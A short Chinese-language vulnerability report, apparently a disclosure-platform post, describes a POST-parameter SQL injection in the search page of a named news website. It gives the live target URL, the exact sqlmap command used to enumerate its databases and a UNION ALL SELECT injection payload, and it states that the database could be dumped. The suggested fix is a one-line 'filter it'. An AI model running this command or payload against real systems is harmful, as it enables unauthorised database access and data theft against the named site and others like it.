搜索页面 post 注入 ,可以脱裤。存在post注入页面 http://wswz.anhuinews.com/search.html
简单用’测试发现存在注入漏洞
firfox=>firebug=>查看搜索框value值 keyword
请出sqlmap
语句如下:python sqlmap.py -u http://wswz.anhuinews.com/search.html --data="keyword=1" --dbs
跑出很多表
如图
Payload: keyword=-9017%' UNION ALL SELECT 80,80,80,80,80,80,CHAR(113)+CHAR(1
18)+CHAR(100)+CHAR(122)+CHAR(113)+CHAR(70)+CHAR(86)+CHAR(97)+CHAR(115)+CHAR(107)
+CHAR(111)+CHAR(82)+CHAR(69)+CHAR(121)+CHAR(109)+CHAR(113)+CHAR(102)+CHAR(109)+C
HAR(99)+CHAR(113),80,80,80,80,80--
可脱裤,我就不继续了。
修复方案:
过滤,交给专业黑客安全人士来做吧。